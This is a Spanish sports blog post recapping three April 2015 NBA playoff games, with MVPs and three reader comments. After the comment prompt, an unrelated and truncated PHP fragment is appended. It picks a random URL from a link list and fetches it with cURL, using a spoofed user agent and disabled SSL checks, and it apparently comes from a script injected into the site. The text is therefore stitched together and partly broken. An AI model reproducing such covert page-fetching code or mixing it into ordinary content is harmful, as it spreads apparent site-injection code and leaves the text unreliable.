La Crónica: De lo que pudo ser y no fue

24 de April de 2015 por MagicJohnson32

Tres partidos, tres victorias visitantes y tres series que se sitúan 3-0. Eso nos dejó la pasada madrugada, en la que Warriors, Bulls y Cavs, claros favoritos de sus respectivas eliminatorias, vencieron no sin apuros. Tanto Celtics, como Bucks y sobre todo Pelicans amanecen hoy pensando en lo que pudo ser y no fue después de ver como el triunfo se les escapaba de entre los dedos.

Golden State Warriors 123 – New Orleans 119 (OT)

De una temporada que se ha caracterizado por la superioridad con la que los Warriors han obtenido la mayoría de sus victorias, posiblemente recordaremos aquellas en las que el equipo dirigido por Steve Kerr se estaba viendo superado por su rival, obligado a remontar grandes diferencias, necesitado de algo más que buen juego para optar a la victoria. No es la primera vez que sucede este año y eso es exactamente lo que sucedió en el Smoothie King Center, donde los Pelicans tuvieron a los californianos en la lona, al borde del k.o., antes de que los triples de Stephen Curry obrasen el milagro y los Warriors dejaran la serie vista para sentencia. 20 puntos de ventaja acumulaban los locales al final del tercer cuarto, una renta que aún era de 15 puntos a falta de 5 minutos para la conclusión, de 10 a falta de 3 minutos y de 5 a 15 segundos para la bocina final. Efectivamente, hizo falta algo más que buen juego para que los Warriors remontasen: el apagón de los Pelicans fue total, en todos los aspectos, en un lado y otro de la cancha. Todo el equipo, incluyendo a Monty Williams, pareció olvidar lo que les había llevado a anotar con comodidad en los tres primeros períodos, y el tembleque generalizado se hizo especialmente evidente en la incapacidad para asegurar el rebote defensivo, aspecto en el que Draymond Green hizo estragos y resultó una de las principales claves en la remotada visitante. Estas circunstancias pavimentaron el camino para Stephen Curry, autor de dos triples en los últimos 11 segundos, el último de ellos de locura, desde la esquina y en fade away, con dos defensores encima, para llevar el partido a la prórroga. En el tiempo extra, los Warriors se marcharon por 6 puntos, pese a lo que los Pelicans aun tuvieron una oportunidad de igualar el partido pero Anthony Davis, que ya había errado un tiro libre que dio a Curry la oportunidad de forzar la prórroga con un triple, no pudo superar a Bogut en el uno contra uno y manchó una actuación que, por otra parte, fue sobresaliente.

MVP: Stephen Curry (40 puntos, 9 asistencias, 5 rebotes).

Chicago Bulls 113 – Milwaukee Bucks 106 (2OT)

¿Ha vuelto Derrick Rose? Su serie contra los Bucks está siendo para ilusionarse, más aun tras su actuación de anoche, y no solo por sus 34 puntos y 8 asistencias, sino por la agresividad con la que atacó el aro y por los 48 minutos que permaneció en cancha. Necesitaron los Bulls este Rose Versión 2011 para llevarse el tercer partido de la serie ante unos Bucks que siguen sin perderle la cara a los partidos pero, como era de esperar, están acusando la falta de experiencia. Anoche lograron lo más difícil, remontar 8 puntos en los últimos 1:30 de partido, para después desperdiciar un par de ocasiones de llevarse el triunfo y lanzar la toalla definitivamente en una segunda prórroga horrible por parte de los locales. Rose volvió a tener en Jimmy Butler a su mejor aliado, mientras que por parte local destacaron Giannis Antetokounmpo y John Henson, quien pasó al primer plano en un momento clave de una temporada muy decepcionante por su parte.

MVP: Derrick Rose (34 puntos, 8 asistencias, 5 rebotes, 3 recuperaciones).

Cleveland Cavaliers 103 – Boston Celtics 95

La película ya la habíamos visto. Se llama “Derrota digna de los Celtics”, tiene como protagonista principal a LeBron James y anoche hubo un nuevo pase en el TD Garden de Boston. El argumento, el de siempre: los Celtics, encasillados en su papel de underdogs, se agarran con uñas y dientes al partido y exigen a los todopoderosos Cavs, que tiran de galones para contener a sus revoltosos rivales y anotarse una nueva victoria. LeBron se está paseando en la eliminatoria y anoche contó otra vez con un gran Love, quien anoche además neutralizó el último intento de remontada local con dos triples cuando el marcador señalaba un amenazador 95-92. La serie se sitúa 3-0 y todo apunta a que nos queda un último pase de “Derrota digna de los Celtics”.

MVP: LeBron James (31 puntos, 11 rebotes, 4 asistencias, 4 robos, 2 tapones).

Top 10

Imágenes | AP Photos / Getty Images

 

Comenta

3 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Curiosamente el partido de ayer me pareció el más controlado por parte de los Cavaliers.Y digo curiosamente por haberse jugado en el Garden.

    No van a alargarse más allá del 5º partido,y ya uno huele el duelo entre Cleveland y Chicago.Jimmy Butler sobre LeBron,Rose vs Irving,Noah cubriendo a Love y Gasol con Mozgov (aquí veo chispas).Pintaza.

      Citar

  2. Jose Luis dice:
    #2

    Me gusta más Gasol vs Love por la intimidación de Noah bajo el aro.

      Citar

  3. Ruxixón dice:
    #3

    Jose Luis:
    Me gusta más Gasol vs Love por la intimidación de Noah bajo el aro.

    Si,puede que tengas razón,sacar a Noah de la pintura facilitaría bastante las cosas para LeBron e Irving.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>